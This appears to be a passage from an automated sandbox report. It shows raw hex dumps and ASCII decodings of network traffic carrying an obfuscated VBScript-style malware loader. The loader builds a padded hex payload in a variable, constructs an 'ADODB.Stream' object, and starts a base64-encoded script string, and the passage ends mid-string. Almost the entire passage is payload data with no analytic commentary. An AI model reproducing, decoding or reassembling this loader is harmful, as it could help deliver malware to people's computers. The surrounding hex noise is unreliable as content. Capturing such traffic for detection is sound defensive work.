                                              2022-05-12 12:01:32 UTC94INData Raw: 42 32 35 45 43 41 4c 4c 44 42 41 36 36 39 43 41 4c 4c 43 41 4c 4c 32 39 33 41 38 43 41 4c 4c 39 32 37 58 69 6c 6f 32 32 38 32 35 38 39 35 43 3a 43 33 44 32 4d 61 38 38 33 43 4d 61 38 38 39 44 42 44 42 33 37 32 4d 61 38 38 32 43 41 4c 4c 39 45 58 69 6c 6f 32 32 42 37 43 3a 43 58 69 6c 6f 32 32 44 44 39 43 43 3a 43 58 69 6c 6f 32 32 33 44 38 43 41 4c 4c 58 69 6c 6f 32 32 45 43 4d 61 38 38 42 58 69 6c 6f 32 32 35 43 3a 43 58 69 6c 6f 32 32 37 58 69 6c 6f 32 32 58 69 6c 6f 32 32 42 32 36 33 32 58 69 6c 6f 32 32 36 41 41 37 44 43 41 4c 4c 43 3a 43 36 58 69 6c 6f 32 32 36 45 36 39 33 43 32 43 43 41 4c 4c 33 38 44 44 33 43 41 4c 4c 41 36 39 38 4d 61 38 38 4d 61 38 38 44 42 4d 61 38 38 43 41 4c 4c 43 36 38 33 43 41 4c 4c 44 4d 61 38 38 38 33 43 41 4c 4c 43 43 4d
                                              Data Ascii: B25ECALLDBA669CALLCALL293A8CALL927Xilo22825895C:C3D2Ma883CMa889DBDB372Ma882CALL9EXilo22B7C:CXilo22DD9CC:CXilo223D8CALLXilo22ECMa88BXilo225C:CXilo227Xilo22Xilo22B2632Xilo226AA7DCALLC:C6Xilo226E693C2CCALL38DD3CALLA698Ma88Ma88DBMa88CALLC683CALLDMa8883CALLCCM
                                              2022-05-12 12:01:32 UTC101INData Raw: 39 37 37 37 35 36 43 41 4c 4c 33 44 43 41 4c 4c 43 43 4d 61 38 38 33 4d 61 38 38 45 37 39 41 43 3a 43 35 38 36 4d 61 38 38 37 33 45 4d 61 38 38 37 43 3a 43 36 39 44 37 35 36 58 69 6c 6f 32 32 32 39 35 39 37 39 4d 61 38 38 4d 61 38 38 43 43 3a 43 4d 61 38 38 43 37 45 42 4d 61 38 38 43 41 4c 4c 43 32 43 3a 43 39 41 36 39 44 41 58 69 6c 6f 32 32 41 39 41 39 58 69 6c 6f 32 32 32 33 38 36 42 42 42 33 32 33 36 36 37 44 43 41 4c 4c 33 37 45 35 43 41 4c 4c 37 33 36 45 43 58 69 6c 6f 32 32 44 32 37 38 58 69 6c 6f 32 32 32 43 43 3a 43 58 69 6c 6f 32 32 43 3a 43 45 37 35 39 44 32 45 36 33 42 38 33 43 3a 43 58 69 6c 6f 32 32 39 32 45 43 38 38 43 3a 43 42 43 39 33 39 43 4d 61 38 38 43 43 3a 43 43 3a 43 43 43 41 4c 4c 38 36 43 43 41 4c 4c 35 38 39 41 39 43 3a 43 58 69
                                              Data Ascii: 977756CALL3DCALLCCMa883Ma88E79AC:C586Ma8873EMa887C:C69D756Xilo22295979Ma88Ma88CC:CMa88C7EBMa88CALLC2C:C9A69DAXilo22A9A9Xilo222386BBB323667DCALL37E5CALL736ECXilo22D278Xilo222CC:CXilo22C:CE759D2E63B83C:CXilo2292EC88C:CBC939CMa88CC:CC:CCCALL86CCALL589A9C:CXi
                                              2022-05-12 12:01:32 UTC109INData Raw: 44 39 37 38 39 43 4d 61 38 38 43 3a 43 35 42 36 58 69 6c 6f 32 32 37 43 3a 43 39 43 41 4c 4c 4d 61 38 38 35 58 69 6c 6f 32 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 42 42 58 69 6c 6f 32 32 41 37 45 45 43 3a 43 42 39 42 43 41 4c 4c 43 3a 43 44 43 43 3a 43 44 58 69 6c 6f 32 32 41 45 36 33 41 41 39 37 37 44 33 36 42 37 37 45 44 58 69 6c 6f 32 32 37 42 43 43 3a 43 43 39 44 44 36 32 33 42 36 4d 61 38 38 37 38 32 45 37 44 43 41 4c 4c 35 43 41 4c 4c 44 33 33 43 45 38 41 39 32 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 37 35 37 35 36 43 3a 43 33 44 43 41 4c 4c 43 43 4d 61 38 38 43 43 45 58 69 6c 6f 32 32 43 43 3a 43 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 33 42 43 3a 43 43 3a 43 39 45 58 69 6c 6f 32 32 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 43 3a 43 43
                                              Data Ascii: D9789CMa88C:C5B6Xilo227C:C9CALLMa885Xilo22CALLDCMa88C:C5BBXilo22A7EEC:CB9BCALLC:CDCC:CDXilo22AE63AA977D36B77EDXilo227BCC:CC9DD623B6Ma88782E7DCALL5CALLD33CE8A92CXilo22C:C53CALL75756C:C3DCALLCCMa88CCEXilo22CC:CXilo229Xilo223BC:CC:C9EXilo22C:C73CALLCALLCC:CC
                                              2022-05-12 12:01:32 UTC117INData Raw: 41 4c 4c 33 38 45 39 41 43 37 32 42 44 39 42 38 44 37 43 3a 43 42 37 37 35 44 32 39 33 44 43 41 4c 4c 43 43 4d 61 38 38 38 39 43 3a 43 42 43 33 33 43 41 4c 4c 4d 61 38 38 45 43 3a 43 41 58 69 6c 6f 32 32 43 41 4c 4c 43 41 4c 4c 43 41 4c 4c 45 43 43 3a 43 38 4d 61 38 38 44 41 39 36 44 58 69 6c 6f 32 32 33 36 39 43 3a 43 39 43 41 4c 4c 38 43 38 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 35 45 43 37 42 43 43 3a 43 43 41 45 36 33 45 43 3a 43 43 3a 43 43 43 4d 61 38 38 39 42 36 36 38 58 69 6c 6f 32 32 33 58 69 6c 6f 32 32 43 35 35 42 58 69 6c 6f 32 32 32 38 37 43 41 4c 4c 39 4d 61 38 38 45 39 41 32 42 43 41 4c 4c 38 39 43 3a 43 41 44 35 43 43 33 4d 61 38 38 39 42 43 3a 43 33 37 41 43 33 38 33 43 44 42 33 43 3a 43 42 43 41 4c 4c 41 37 44 33 37
                                              Data Ascii: ALL38E9AC72BD9B8D7C:CB775D293DCALLCCMa8889C:CBC33CALLMa88EC:CAXilo22CALLCALLCALLECC:C8Ma88DA96DXilo22369C:C9CALL8C8CALLDCMa88C:C5CALL395EC7BCC:CCAE63EC:CC:CCCMa889B668Xilo223Xilo22C55BXilo22287CALL9Ma88E9A2BCALL89C:CAD5CC3Ma889BC:C37AC383CDB3C:CBCALLA7D37
                                              2022-05-12 12:01:32 UTC125INData Raw: 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 4d 61 38 38 39 43 44 35 4d 61 38 38 45 45 4d 61 38 38 32 42 43 43 43 41 4c 4c 39 41 41 43 3a 43 42 43 41 4c 4c 4d 61 38 38 42 58 69 6c 6f 32 32 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 43 4d 61 38 38 38 39 43 41 4c 4c 38 38 39 43 3a 43 58 69 6c 6f 32 32 43 41 4c 4c 36 41 38 35 36 44 37 43 3a 43 33 39 43 41 4c 4c 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 42 36 37 36 45 35 41 43 41 4c 4c 38 43 58 69 6c 6f 32 32 37 43 3a 43 35 41 42 43 35 36 39 36 45 35 4d 61 38 38 4d 61 38 38 37 43 4d 61 38 38 44 41 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 4d 61 38 38 4d 61 38 38 43 3a 43 38 39 4d 61 38 38 43 41 4c 4c 32 43 41 4c 4c 33 38 42 35 33 38 44 32 45 44 43 3a 43 45 45 42 41 44 41 37 43 3a 43 58 69 6c
                                              Data Ascii: 2CALLDCMa88C:C5CALL38Ma889CD5Ma88EEMa882BCCCALL9AAC:CBCALLMa88BXilo22CALLDCMa88C:C5CMa8889CALL889C:CXilo22CALL6A856D7C:C39CALLC:C53CALL3Ma88B676E5ACALL8CXilo227C:C5ABC5696E5Ma88Ma887CMa88DACALLDCMa88C:C5Ma88Ma88C:C89Ma88CALL2CALL38B538D2EDC:CEEBADA7C:CXil
                                              2022-05-12 12:01:32 UTC133INData Raw: 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 38 39 43 3a 43 42 35 36 37 37 35 38 38 43 41 4c 4c 35 37 35 41 43 3a 43 33 41 37 45 41 58 69 6c 6f 32 32 45 41 41 43 37 37 41 4d 61 38 38 43 33 58 69 6c 6f 32 32 44 39 42 44 58 69 6c 6f 32 32 41 33 43 41 4c 4c 58 69 6c 6f 32 32 42 4d 61 38 38 43 43 36 35 41 36 41 43 43 44 39 43 33 35 39 33 4d 61 38 38 42 58 69 6c 6f 32 32 42 43 3a 43 43 41 4c 4c 43 33 58 69 6c 6f 32 32 44 38 41 32 42 42 35 45 43 36 42 41 43 3a 43 41 42 38 4d
                                              Data Ascii: 63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C789C:CB5677588CALL575AC:C3A7EAXilo22EAAC77AMa88C3Xilo22D9BDXilo22A3CALLXilo22BMa88CC65A6ACCD9C3593Ma88BXilo22BC:CCALLC3Xilo22D8A2BB5EC6BAC:CAB8M
                                              2022-05-12 12:01:32 UTC140INData Raw: 43 3a 43 32 37 45 44 35 43 38 33 35 33 45 43 38 43 3a 43 35 43 41 4c 4c 33 39 33 35 33 39 45 36 44 43 41 4c 4c 41 43 41 4c 4c 43 3a 43 35 39 43 41 4c 4c 38 42 37 41 32 44 41 36 32 58 69 6c 6f 32 32 33 58 69 6c 6f 32 32 43 3a 43 36 32 39 45 39 38 37 35 58 69 6c 6f 32 32 33 42 36 36 58 69 6c 6f 32 32 43 33 43 3a 43 37 33 43 41 4c 4c 43 41 4c 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 4c 43 43 3a 43 42 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 42 43 41 4c 4c 43 3a 43 4d 61 38 38 43 32 44 37 37 35 45 45 43 41 4c 4c 4d 61 38 38 58 69 6c 6f 32 32 41 41 35 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 43 41 4c 4c 32 36 43 41 4c 4c 43 3a 43 36 37 43 3a 43 43 41 43 41 4c 4c 41 36 32 42 33 35 43 41 4c 4c 4d 61 38 38 58
                                              Data Ascii: C:C27ED5C8353EC8C:C5CALL393539E6DCALLACALLC:C59CALL8B7A2DA62Xilo223Xilo22C:C629E9875Xilo223B66Xilo22C3C:C73CALLCAL"funktionsk = funktionsk & "LCC:CBXilo229Xilo22BCALLC:CMa88C2D775EECALLMa88Xilo22AA5Ma88Xilo22Xilo22CALL26CALLC:C67C:CCACALLA62B35CALLMa88X
                                              2022-05-12 12:01:32 UTC148INData Raw: 41 44 44 45 36 43 41 4c 4c 32 45 43 4d 61 38 38 43 32 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 42 37 43 41 4c 4c 43 3a 43 36 42 41 42 4d 61 38 38 43 43 41 4c 4c 44 43 41 4c 4c 39 43 43 43 3a 43 35 39 4d 61 38 38 37 41 45 41 36 58 69 6c 6f 32 32 44 4d 61 38 38 38 4d 61 38 38 38 42 42 44 4d 61 38 38 4d 61 38 38 32 37 45 43 45 42 32 35 43 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 43 3a 43 36 39 44 43 3a 43 43 33 44 36 43 41 4c 4c 32 38 36 45 58 69 6c 6f 32 32 44 43 41 4c 4c 43 43 4d 61 38 38 43 43 42 41 32 43 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 41 39 38 32 45 42 43 3a 43 39 42 38 38 33 58 69 6c 6f 32 32 44 37 38 4d 61 38 38 38 44 58 69 6c 6f 32 32 37 4d 61 38 38 43 41 4c 4c 39 32 41 42 33
                                              Data Ascii: ADDE6CALL2ECMa88C2"funktionsk = funktionsk & "B7CALLC:C6BABMa88CCALLDCALL9CCC:C59Ma887AEA6Xilo22DMa888Ma888BBDMa88Ma8827ECEB25CCMa88C:C53CALLC:C69DC:CC3D6CALL286EXilo22DCALLCCMa88CCBA2CCMa88C:C53CALL3Ma88A982EBC:C9B883Xilo22D78Ma888DXilo227Ma88CALL92AB3
                                              2022-05-12 12:01:32 UTC156INData Raw: 38 38 43 43 45 43 3a 43 43 41 4c 4c 45 4d 61 38 38 43 3a 43 36 35 38 43 3a 43 38 35 35 32 37 45 32 4d 61 38 38 43 32 43 41 4c 4c 41 36 4d 61 38 38 43 3a 43 41 43 3a 43 35 44 36 41 45 45 38 45 37 43 33 43 36 38 43 3a 43 39 33 4d 61 38 38 43 36 36 37 32 38 43 45 42 41 4d 61 38 38 38 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 33 45 43 43 3a 43 43 3a 43 35 43 4d 61 38 38 43 3a 43 39 32 38 43 3a 43 35 33 43 41 4c 4c 43 41 4c 4c 43 33 43 41 4c 4c 43 41 4c 4c 4d 61 38 38 44 43 41 4c 4c 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 39 43 3a 43 33 43 3a 43 43 3a 43 41 43 43 3a 43 39 45 42 43 3a 43 44 4d 61 38 38 44 39 44 41 36 37 43 41 4c 4c 39 41 36 39 39 37 33 33 37 58 69 6c 6f 32 32 39 44 32 44 37 41 44 4d 61 38 38 43 41 4c 4c 43 33 43 4d 61 38 38 43
                                              Data Ascii: 88CCEC:CCALLEMa88C:C658C:C85527E2Ma88C2CALLA6Ma88C:CAC:C5D6AEE8E7C3C68C:C93Ma88C66728CEBAMa888CMa88C:C53CALL3ECC:CC:C5CMa88C:C928C:C53CALLCALLC3CALLCALLMa88DCALLCALLCCMa88C:C5CALL39C:C3C:CC:CACC:C9EBC:CDMa88D9DA67CALL9A6997337Xilo229D2D7ADMa88CALLC3CMa88C
                                              2022-05-12 12:01:32 UTC164INData Raw: 43 42 45 41 58 69 6c 6f 32 32 35 37 42 32 37 33 58 69 6c 6f 32 32 37 45 33 44 43 38 43 3a 43 44 35 37 39 33 37 44 45 38 43 41 4c 4c 4d 61 38 38 38 45 43 3a 43 36 45 35 33 32 4d 61 38 38 58 69 6c 6f 32 32 35 45 58 69 6c 6f 32 32 45 42 43 37 43 41 4c 4c 43 39 36 44 35 4d 61 38 38 43 43 33 4d 61 38 38 4d 61 38 38 36 4d 61 38 38 33 4d 61 38 38 35 36 43 3a 43 4d 61 38 38 44 32 39 43 37 38 42 44 38 32 42 43 3a 43 35 32 43 43 3a 43 45 43 38 38 42 42 36 43 41 4c 4c 41 44 32 33 38 42 41 44 37 32 43 38 43 45 44 33 42 38 33 43 41 4c 4c 4d 61 38 38 36 43 33 43 41 4c 4c 33 39 37 38 42 42 4d 61 38 38 43 41 4c 4c 37 4d 61 38 38 35 33 38 44 41 36 33 43 41 4c 4c 32 33 37 42 43 3a 43 42 38 38 43 43 41 4c 4c 33 43 41 4c 4c 39 37 44 35 37 43 44 37 44 39 44 38 32 38 42 37 38
                                              Data Ascii: CBEAXilo2257B273Xilo227E3DC8C:CD57937DE8CALLMa888EC:C6E532Ma88Xilo225EXilo22EBC7CALLC96D5Ma88CC3Ma88Ma886Ma883Ma8856C:CMa88D29C78BD82BC:C52CC:CEC88BB6CALLAD238BAD72C8CED3B83CALLMa886C3CALL3978BBMa88CALL7Ma88538DA63CALL237BC:CB88CCALL3CALL97D57CD7D9D828B78
                                              2022-05-12 12:01:32 UTC172INData Raw: 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 42 42 32 43 3a 43 41 36 43 43 3a 43 43 4d 61 38 38 37 58 69 6c 6f 32 32 37 38 41 44 37 41 58 69 6c 6f 32 32 44 33 43 41 4c 4c 42 41 43 41 4c 4c 32 43 44 38 45 58 69 6c 6f 32 32 39 41 37 38 32 36 37 37 33 42 58 69 6c 6f 32 32 37 33 39 45 37 33 42 43 41 4c 4c 36 36 42 37 43 3a 43 43 3a 43 42 41 37 4d 61 38 38 33 43 38 4d 61 38 38 33 4d 61 38 38 38 35 33 58 69 6c 6f 32 32 42 44 37 37 4d 61 38 38 33 33 43 3a 43 43 36 36 42 37 33 38 41 43 3a 43 43 33 33 33 32 45 43 39 39 36 33 36 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 43 41 4c 4c 44 38 44 44 33 38 4d 61 38 38 43 43 41 4c 4c 44 35 33 42 58 69 6c 6f 32 32
                                              Data Ascii: 63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863BB2C:CA6CC:CCMa887Xilo2278AD7AXilo22D3CALLBACALL2CD8EXilo229A7826773BXilo22739E73BCALL66B7C:CC:CBA7Ma883C8Ma883Ma88853Xilo22BD77Ma8833C:CC66B738AC:CC3332EC99636Ma88Xilo22Xilo22CALLD8DD38Ma88CCALLD53BXilo22
                                              2022-05-12 12:01:32 UTC180INData Raw: 37 43 3a 43 43 3a 43 41 4d 61 38 38 42 43 33 44 43 32 43 43 41 32 35 33 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 43 43 3a 43 58 69 6c 6f 32 32 38 43 43 43 41 4c 4c 43 3a 43 37 39 58 69 6c 6f 32 32 42 58 69 6c 6f 32 32 36 44 43 3a 43 45 4d 61 38 38 45 32 58 69 6c 6f 32 32 45 39 4d 61 38 38 4d 61 38 38 42 41 58 69 6c 6f 32 32 36 4d 61 38 38 36 43 33 42 36 45 37 41 37 37 58 69 6c 6f 32 32 43 3a 43 38 42 32 33 58 69 6c 6f 32 32 44 41 37 36 43 41 4c 4c 42 32 35 45 44 39 39 33 38 32 39 58 69 6c 6f 32 32 43 33 38 38 41 44 37 43 3a 43 39 41 43 3a 43 42 44 38 39 4d 61 38 38 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 35 39 37 44 33 42 43 41 4c 4c 41 45 45 37 37 39 43 36 58 69 6c 6f 32 32 33 33 37 39 58 69 6c 6f 32 32 42 43 43 42 41 44 4d 61 38 38 43 32 43 3a
                                              Data Ascii: 7C:CC:CAMa88BC3DC2CCA253CXilo22C:C53CALLCC:CXilo228CCCALLC:C79Xilo22BXilo226DC:CEMa88E2Xilo22E9Ma88Ma88BAXilo226Ma886C3B6E7A77Xilo22C:C8B23Xilo22DA76CALLB25ED993829Xilo22C388AD7C:C9AC:CBD89Ma88CALLDCMa88C:C5597D3BCALLAEE779C6Xilo223379Xilo22BCCBADMa88C2C:
                                              2022-05-12 12:01:32 UTC187INData Raw: 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 41 36 37 43 43 41 4c 4c 37 37 37 39 43 36 58 69 6c 6f 32 32 33 33 37 37 38 43 3a 43 36 58 69 6c 6f 32 32 32 43 41 4c 4c 43 41 4c 4c 44 58 69 6c 6f 32 32 38 43 43 43 41 4c 4c 39 37 43 33 43 41 42 43 38 32 37 41 36 37 43 45 37 37 35 58 69 6c 6f 32 32 43 41 4c 4c 35 33 32 38 58 69 6c 6f 32 32 37 44 43 33 37 38 39 58 69 6c 6f 32 32 35 35 35 44 36 36 42 45 44 35 37 43 3a 43 4d 61 38 38 37 43 37 35 45 45 43 58 69 6c 6f 32 32 4d 61 38 38 58 69 6c 6f 32 32 41 43 41 4c 4c 58 69 6c 6f 32 32 32 44 32 42 43 3a 43 39 58 69 6c
                                              Data Ascii: C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma88A67CCALL7779C6Xilo2233778C:C6Xilo222CALLCALLDXilo228CCCALL97C3CABC827A67CE775Xilo22CALL5328Xilo227DC3789Xilo22555D66BED57C:CMa887C75EECXilo22Ma88Xilo22ACALLXilo222D2BC:C9Xil
                                              2022-05-12 12:01:32 UTC195INData Raw: 44 4d 61 38 38 39 41 43 3a 43 58 69 6c 6f 32 32 42 45 58 69 6c 6f 32 32 35 58 69 6c 6f 32 32 33 43 43 41 4c 4c 43 4d 61 38 38 43 41 4c 4c 36 42 35 33 43 41 4c 4c 42 41 35 45 33 42 43 3a 43 35 45 45 33 45 43 41 4c 4c 43 43 4d 61 38 38 43 4d 61 38 38 43 3a 43 35 44 37 38 41 43 43 3a 43 38 41 35 37 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 43 43 41 4c 4c 4d 61 38 38 44 37 4d 61 38 38 4d 61 38 38 43 41 4c 4c 37 44 37 35 45 45 33 45 43 41 4c 4c 43 43 4d 61 38 38 33 45 32 42 45 33 43 3a 43 44 41 45 32 35 43 3a 43 39 45 33 35 38 39 38 42 4d 61 38 38 36 32 58 69 6c 6f 32 32 38 43 3a 43 45 4d 61 38 38 43 42 32 45 43 42 43 3a 43 58 69 6c 6f 32 32 39 37 35 36 36 32 32 35 42 38 43 45 37 36 32 38 44 33 4d 61 38 38 33 37 39 36 37 37 32 35 43 43 3a 43 38 41 35 37
                                              Data Ascii: DMa889AC:CXilo22BEXilo225Xilo223CCALLCMa88CALL6B53CALLBA5E3BC:C5EE3ECALLCCMa88CMa88C:C5D78ACC:C8A57CXilo22C:C53CALLCCALLMa88D7Ma88Ma88CALL7D75EE3ECALLCCMa883E2BE3C:CDAE25C:C9E35898BMa8862Xilo228C:CEMa88CB2ECBC:CXilo2297566225B8CE7628D3Ma8837967725CC:C8A57
                                              2022-05-12 12:01:32 UTC203INData Raw: 43 41 4c 4c 4d 61 38 38 42 42 36 39 43 3a 43 32 45 44 32 58 69 6c 6f 32 32 39 45 43 39 43 3a 43 58 69 6c 6f 32 32 42 42 58 69 6c 6f 32 32 32 39 38 36 58 69 6c 6f 32 32 37 4d 61 38 38 33 4d 61 38 38 37 39 42 45 4d 61 38 38 43 3a 43 43 4d 61 38 38 4d 61 38 38 33 39 45 32 33 42 45 4d 61 38 38 36 39 33 37 43 42 42 58 69 6c 6f 32 32 39 43 3a 43 42 4d 61 38 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 42 45 4d 61 38 38 4d 61 38 38 36 43 3a 43 35 4d 61 38 38 32 37 43 43 4d 61 38 38 43 44 42 43 41 4c 4c 43 43 36 4d 61 38 38 43 35 33 43 41 4c 4c 43 41 4c 4c 39 41 36 58 69 6c 6f 32 32 32 35 39 43 3a 43 33 37 43 43 3a 43 35 35 39 41 33 4d 61 38 38 36 4d 61 38 38 35 33 45 39 43 41 36 42 32 43 41 4c 4c 38 33 43 41 4c 4c 44 32 43 35 43 3a 43 43 41 4c 4c 43 41 4c 4c 44 33 58
                                              Data Ascii: CALLMa88BB69C:C2ED2Xilo229EC9C:CXilo22BBXilo222986Xilo227Ma883Ma8879BEMa88C:CCMa88Ma8839E23BEMa886937CBBXilo229C:CBMa88Xilo22Xilo22BEMa88Ma886C:C5Ma8827CCMa88CDBCALLCC6Ma88C53CALLCALL9A6Xilo22259C:C37CC:C559A3Ma886Ma8853E9CA6B2CALL83CALLD2C5C:CCALLCALLD3X
                                              2022-05-12 12:01:32 UTC211INData Raw: 38 38 33 33 43 41 4c 4c 42 41 36 58 69 6c 6f 32 32 39 41 43 3a 43 58 69 6c 6f 32 32 42 43 41 4c 4c 37 43 41 4c 4c 32 36 43 3a 43 4d 61 38 38 4d 61 38 38 36 43 39 32 41 43 41 4c 4c 38 39 36 42 43 41 4c 4c 39 37 33 36 37 58 69 6c 6f 32 32 35 39 43 35 4d 61 38 38 58 69 6c 6f 32 32 43 35 37 43 4d 61 38 38 41 39 43 41 4c 4c 37 43 43 41 4c 4c 43 3a 43 37 35 38 33 42 32 37 43 41 4c 4c 37 35 43 3a 43 44 37 43 41 4c 4c 33 44 43 41 4c 4c 43 43 4d 61 38 38 45 44 58 69 6c 6f 32 32 43 43 3a 43 35 32 35 58 69 6c 6f 32 32 43 36 38 39 36 43 3a 43 43 3a 43 38 43 3a 43 42 45 4d 61 38 38 44 45 33 43 41 4c 4c 37 42 58 69 6c 6f 32 32 38 43 3a 43 43 3a 43 43 3a 43 41 41 42 45 58 69 6c 6f 32 32 35 42 44 32 39 41 43 3a 43 42 39 43 3a 43 58 69 6c 6f 32 32 42 43 3a 43 37 36 42 33
                                              Data Ascii: 8833CALLBA6Xilo229AC:CXilo22BCALL7CALL26C:CMa88Ma886C92ACALL896BCALL97367Xilo2259C5Ma88Xilo22C57CMa88A9CALL7CCALLC:C7583B27CALL75C:CD7CALL3DCALLCCMa88EDXilo22CC:C525Xilo22C6896C:CC:C8C:CBEMa88DE3CALL7BXilo228C:CC:CC:CAABEXilo225BD29AC:CB9C:CXilo22BC:C76B3
                                              2022-05-12 12:01:32 UTC219INData Raw: 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33
                                              Data Ascii: 863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863
                                              2022-05-12 12:01:32 UTC226INData Raw: 39 45 42 36 37 38 58 69 6c 6f 32 32 58 69 6c 6f 32 32 4d 61 38 38 35 58 69 6c 6f 32 32 39 38 32 38 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 37 41 43 38 58 69 6c 6f 32 32 42 44 35 39 42 45 33 38 45 41 43 41 4c 4c 43 3a 43 37 43 41 4c 4c 38 35 37 43 4d 61 38 38 43 41 4c 4c 44 58 69 6c 6f 32 32 43 3a 43 58 69 6c 6f 32 32 35 39 35 43 4d 61 38 38 4d 61 38 38 33 22 0d 0a 0d 0a 0d 0a 20 20 41 44 4f 20 3d 20 46 6f 72 73 28 36 35 29 20 26 20 22 44 4f 44 42 2e 53 74 72 65 61 6d 22 0d 0a 0d 0a 0d 0a 54 61 72 74 61 20 3d 20 54 61 72 74 61 20 26 20 22 49 77 42 74 41 47 55 41 63 77 42 76 41 43 41 41 5a 41 42 70 41 48 51 41 64 41 42 76 41 47 63 41 49 41 42 7a 41 48 51 41 61 67 42 6c 41 48 49 41 64 41 42 6f 41 47 45 41 5a 77 42 6c 41 43 41 41 55 41 42 79 41 47 55 41 64 67
                                              Data Ascii: 9EB678Xilo22Xilo22Ma885Xilo229828Xilo229Xilo227AC8Xilo22BD59BE38EACALLC:C7CALL857CMa88CALLDXilo22C:CXilo22595CMa88Ma883" ADO = Fors(65) & "DODB.Stream"Tarta = Tarta & "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdg
                                              2022-05-12 12:01:32 UTC234INData Raw: 41 45 67 41 54 77 42 51 41 45 45 41 54 41 42 50 41 45 4d 41 52 51 42 53 41 43 41 41 5a 51 42 75 41 47 4d 41 61 41 42 68 41 48 4d 41 5a 51 42 79 41 43 41 41 44 51 41 4b 41 43 4d 41 64 67 42 76 41 47 77 41 5a 41 42 4d 61 38 38 41 47 63 41 64 41 41 67 41 43 41 4c 4c 55 41 52 41 42 54 41 45 77 41 51 51 42 48 41 45 63 41 53 51 42 57 41 43 41 41 51 67 42 68 41 47 77 41 59 51 42 75 41 43 41 41 51 51 42 72 41 48 51 41 61 51 42 32 41 47 6b 41 64 41 41 4d 61 38 38 41 43 41 41 52 51 42 4c 41 43 41 4c 4c 4d 41 55 41 42 50 41 43 41 4c 4c 4d 41 53 51 42 55 41 45 6b 41 54 77 41 67 41 48 4d 41 64 41 42 68 41 47 4d 61 38 38 41 62 51 42 6c 41 43 41 41 54 51 42 35 41 48 51 41 61 41 42 76 41 47 77 41 62 77 41 43 3a 43 41 43 41 41 56 41 42 49 